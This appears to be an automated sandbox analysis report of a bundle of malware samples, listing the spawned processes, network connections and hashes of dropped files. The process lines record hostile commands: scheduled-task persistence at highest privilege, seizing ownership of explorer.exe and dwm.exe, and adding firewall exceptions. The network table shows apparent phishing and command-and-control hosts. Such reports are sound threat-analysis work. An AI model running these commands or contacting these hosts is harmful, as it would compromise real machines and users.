C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe
ac3.exe
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1"
C:\Windows\SysWOW64\PING.EXE
ping trustsentry.com -t -n 1 -s 4 -4
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\PING.EXE
ping ya.ru -t -n 1 -s 4 -4
C:\Windows\SysWOW64\PING.EXE
ping tria.ge -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy bloatware C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy beastify.url C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy shell1.ps1 C:\Users\Admin\Desktop
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{C5BD4162-E564-4F77-B365-36BD5383442A} {309B46C4-58D8-4921-9D7C-3B790364B964} 1952
C:\Windows\SysWOW64\cmd.exe
cmd /c install.bat
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "DroidCamFilter32.ax"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "DroidCamFilter64.ax"
C:\Windows\system32\regsvr32.exe
/s "DroidCamFilter64.ax"
C:\Program Files (x86)\DroidCam\lib\insdrv.exe
"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{512bbd22-4f1b-194d-e1f1-cd06e8f26378}\droidcam.inf" "9" "6e67c8bbf" "00000000000005DC" "WinSta0\Default" "00000000000005D4" "208" "c:\program files (x86)\droidcam\lib"
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Windows\system32\pnpui.dll,InstallSecurityPromptRunDllW 20 Global\{540e316d-1e11-02b0-5321-292876b9ca2d} Global\{6eb0db00-4d67-6993-166d-7d1fdab5c452} C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem2.inf" "droidcam.inf:MicrosoftDS.NTAMD64:DroidCam_PCMEX:1.0.0.1:droidcam" "6e67c8bbf" "00000000000005DC" "00000000000005FC" "00000000000005F8"
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\explorer.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\explorer.exe /grant Admin:(F)
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\System32\dwm.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
C:\Windows\SysWOW64\xcopy.exe
xcopy xcer.cer C:\Users\Admin\Desktop
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe
freebobux.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe
SolaraBootstraper.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ctfmon.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat""
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll
wim.dll
C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe
clwcp c:\temp\bg.bmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd" "
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\cringe.mp4"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\lol.ini
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\mailgooglecom.json
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\CLOCK.py
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:734221 /prefetch:2
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\x.vbs"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe
f3cb220f1aaa32ca310586e5f62dcab1.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:3748878 /prefetch:2
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SysWOW64\xcopy.exe
xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\regedit.exe
regedit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x584
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | https-login--microsoftonline--com.httpsproxy.net | udp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| US | 152.199.21.175:443 | aadcdn.msftauth.net | tcp |
| US | 152.199.21.175:443 | aadcdn.msftauth.net | tcp |
| US | 152.199.21.175:443 | aadcdn.msftauth.net | tcp |
| US | 8.8.8.8:53 | mrbeast.codes | udp |
| US | 8.8.8.8:53 | dwrapper-prod.herokuapp.com | udp |
| IE | 54.73.53.134:80 | dwrapper-prod.herokuapp.com | tcp |
| IE | 54.73.53.134:80 | dwrapper-prod.herokuapp.com | tcp |
| US | 8.8.8.8:53 | exampledd.matomo.cloud | udp |
| DE | 18.157.122.248:80 | exampledd.matomo.cloud | tcp |
| US | 8.8.8.8:53 | a2957.q.akamai.net | udp |
| GB | 2.23.210.92:443 | a2957.q.akamai.net | tcp |
| FR | 5.157.51.190:53 | udp | |
| ES | 185.93.182.46:53 | tcp | |
| RS | 152.89.160.205:983 | tcp | |
| ES | 212.227.33.35:22 | tcp | |
| BG | 185.216.32.42:443 | tcp | |
| US | 74.208.156.127:53 | tcp | |
| DE | 217.160.104.214:22 | tcp | |
| PL | 5.157.22.182:22 | tcp | |
| JP | 172.105.221.253:53 | tcp | |
| FR | 57.128.125.147:80 | 57.128.125.147 | tcp |
| US | 8.8.8.8:53 | ipfounder.net | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| US | 8.8.8.8:53 | trustsentry.com | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| N/A | 127.0.0.1:50984 | tcp | |
| US | 8.8.8.8:53 | tria.ge | udp |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| US | 8.8.8.8:53 | having-jackson.gl.at.ply.gg | udp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| N/A | 127.0.0.1:50984 | tcp | |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
Files
memory/2072-0-0x000000007403E000-0x000000007403F000-memory.dmp
memory/2072-1-0x0000000001210000-0x000000000126E000-memory.dmp
memory/2072-2-0x0000000000550000-0x0000000000574000-memory.dmp
memory/2072-3-0x0000000074030000-0x000000007471E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd
| MD5 | 5bef4958caf537ac924b6ce01e1d1e13 |
| SHA1 | cf7a0805a98f3c16ca14c6e420e2ca44ad77a164 |
| SHA256 | e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d |
| SHA512 | 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.pack
| MD5 | 34a66c4ec94dbdc4f84b4e6768aebf4e |
| SHA1 | d6f58b372433ad5e49a20c85466f9fb3627abff2 |
| SHA256 | fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb |
| SHA512 | 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\spread.cmd
| MD5 | 7a71a7e1d8c6edf926a0437e49ae4319 |
| SHA1 | d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1 |
| SHA256 | e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae |
| SHA512 | 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\doxx.cmd
| MD5 | 013a01835332a3433255e3f2dd8d37d6 |
| SHA1 | 8a318cc4966eee5ebcb2c121eb4453161708f96c |
| SHA256 | 23923556f7794769015fb938687bf21c28ae5f562c4550c41d3d568ad608b99b |
| SHA512 | 12e9d439c8c558218d49415bbd27d0749f9f7a7e6c177074e11ac1a6f2185c22c4cf51f5a41133eaddf8a06288c352460d4450ad9702c4652ad259ed1260f42d |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.didata
| MD5 | 41b8ce23dd243d14beebc71771885c89 |
| SHA1 | 051c6d0acda9716869fbc453e27230d2b36d9e8f |
| SHA256 | bc86365a38e3c8472413f1656a28b04703d8c77cc50c0187ddf9d0afbb1f9bf7 |
| SHA512 | f0fb505c9f8d2699717641c3571acb83d394b0f8eee9cff80ad95060d1993f9f4d269c58eb35aae64a639054e42aaa699719b08357f7c0c057b407e2bdf775da |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.edata
| MD5 | 37c1a5c63717831863e018c0f51dabb7 |
| SHA1 | 8aab4ebcf9c4a3faf3fc872d96709460d6bf6378 |
| SHA256 | d975b12871fc3f217b71bb314e5e9ea6340b66ece9e26a0c9cbd46de22368941 |
| SHA512 | 4cf2b8efa3c4520cc80c4d560662bddbe4071b6908d29550d59bcda94c8b80a282b5e0b4536a88331a6a507e8410ccb35f4e38d0b571960f822bda7b69e4bb19 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.idata
| MD5 | a73d686f1e8b9bb06ec767721135e397 |
| SHA1 | 42030ea2f06f38d5495913b418e993992e512417 |
| SHA256 | a0936d30641746144eae91e37e8cbed42dc9b3ee3e5fdda8e45ad356180f0461 |
| SHA512 | 58942400f6b909e42d36187fd19d64a56b92c2343ed06f6906291195fea6fe5a79fc628cbfc7c64e09f0196cbaba83dc376985ceef305bd0a2fadaca14b5c9e5 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\0.txt
| MD5 | c1672053cdc6d8bf43ee7ac76b4c5eee |
| SHA1 | fc1031c30cc72a12c011298db8dc9d03e1d6f75c |
| SHA256 | 1cdb267b3e66becf183e9e747ae904e8684bab519041f39f9bd0b7dd0b3c66cb |
| SHA512 | 12e64a77c5b07d1f0fe1f07a6bf01078373d99bb7372a2d8a5c44fdbf753b44381f112822c1f75475e762d85fcf806487925860941005d342473ec90f9997633 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.txt
| MD5 | 8f2f090acd9622c88a6a852e72f94e96 |
| SHA1 | 735078338d2c5f1b3f162ce296611076a9ddcf02 |
| SHA256 | 61da25d2beb88b55ef629fab530d506a37b56cfabfa95916c6c5091595d936e4 |
| SHA512 | b98fbb6d503267532d85bf0eb466e4e25169baefafdaaa97bdc44eaab2487419fde106626c0cc935ba59bcb4472597e23b3c21e3347ed32de53c185739735404 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\CERTIFICATE.cer
| MD5 | c07164d3b38ca643290adaa325e1d842 |
| SHA1 | 895841abf68668214e5c8aa0a1600ff6b88e299d |
| SHA256 | da5dd4622c1c9054dc2c01cb36d26802ffbd3345e8cf8a20a2e8d7a859251600 |
| SHA512 | 92922192fdca0b6a0a6634415fd0ccdd32087584b7b2ea0a1e550b8bf9a5c8fe79401fadc0de8d4d340ef700a01079b51529adcab576f0ca17a864748ae39118 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\data.txt
| MD5 | 4c195d5591f6d61265df08a3733de3a2 |
| SHA1 | 38d782fd98f596f5bf4963b930f946cf7fc96162 |
| SHA256 | 94346a0e38b0c2ccd03cf9429d1c1bce2562c29110bb29a9b0befc6923618146 |
| SHA512 | 10ee2e62ca1efa1cda51ca380a36dfabdd2e72cec41299369cac95fc3864ca5f4faa959f70d2b2c145430e591b1249f233b31bd78ba9ee64cf0604c887b674d7 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\i.txt
| MD5 | d40fc822339d01f2abcc5493ac101c94 |
| SHA1 | 83d77b6dc9d041cc5db064da4cae1e287a80b9e6 |
| SHA256 | b28af33bc028474586bb62da7d4991ddd6f898df7719edb7b2dfce3d0ea1d8c6 |
| SHA512 | 5701c2a68f989e56e7a38e13910421c8605bc7b58ae9b87c1d15375829e100bad4ac86186f9d5670c9a5e0dd3e46f097d1d276e62d878e0c2f6eb5f6db77dd46 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\_.txt
| MD5 | ad6e46e3a3acdb533eb6a077f6d065af |
| SHA1 | 595ad8ee618b5410e614c2425157fa1a449ec611 |
| SHA256 | b68ad9b352910f95e5496032eea7e00678c3b2f6b0923eb88a6975ef52daf459 |
| SHA512 | 65d1f189e905419cc0569fd7f238af4f8ba726a4ddad156345892879627d2297b2a29213ac8440756efb1d7aaead1c0858462c4d039b0327af16cbb95840a1e8 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\CODE2000.TTF
| MD5 | 052eaff1c80993c8f7dca4ff94bb83ca |
| SHA1 | 62a148210e0103b860b7c3257a18500dff86cb83 |
| SHA256 | afabc4e845085d6b4f72a9de672d752c002273b52221a10caf90d8cb03334f3c |
| SHA512 | 57209c40b55170da437ab1120b2f486d698084d7d572b14889b2184e8327010a94eee25a86c9e0156ba12ed1a680507016390f059f265cceb3aa8698e8e94764 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\readme.txt
| MD5 | d6b389a0317505945493b4bfc71c6d51 |
| SHA1 | a2027bc409269b90f4e33bb243adeb28f7e1e37b |
| SHA256 | d94ed2f7aa948e79e643631e0cd73cf6a221790c05b50ad1d6220965d85ac67c |
| SHA512 | 4ea3c8bdee2b9e093d511a7e4ded557f182df8d96e798cb9ee95014f3b99ebd21f889516e5f934033b01b7ca1e26f5444f2e6be0cc0d7fba0b3faa4cea40e187 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1344.MP4
| MD5 | 038725879c68a8ebe2eaa26879c65574 |
| SHA1 | 34062adf5ac391effba12d2cfd9f349b56fd12dc |
| SHA256 | eec8517fe10284368ed5c5b38b7998f573cc6a9d06ae535fe0057523819788be |
| SHA512 | 7b494cd77cb3f2aff8fd6aa68a9ba5cfc87fcaefa36b882e2f930bf82029526257c41a5205364cafc66f4c0f5d154cc1dfe44a6db06952075047975e2156e564 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1598.MP4
| MD5 | 808c2e1e12ddd159f91ed334725890f4 |
| SHA1 | 96522421df4eb56c6d069a29fa4e1202c54eb4e4 |
| SHA256 | 5588c6bf5b74c0a8b088787a536ef729bcedaedfc554ef317beea7fca3b392f7 |
| SHA512 | f6205b07c68f3b6abe7daf0517fbc07def4cb471bd754cd25333f5301dc9f1ac439217c6a09c875376ece4f6fb348e8b9e44e6e8a813ac5d8078cedc5b60bb3c |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1599.MP4
| MD5 | 06947b925a582d2180ed7be2ba196377 |
| SHA1 | 34f35738fdf5c51fa28093ee06be4c12fcbd9fda |
| SHA256 | b09bd14497d3926dc3717db9a3607c3cec161cc5b73c1af7e63d9ccce982a431 |
| SHA512 | 27f6e3882db9f88834023ff3ece9f39cb041548e772af89d49c97fea7d7ceb4f2efdc019a89c0edf3308929a88fd488749fec97c63b836de136c437300b9ff73 |
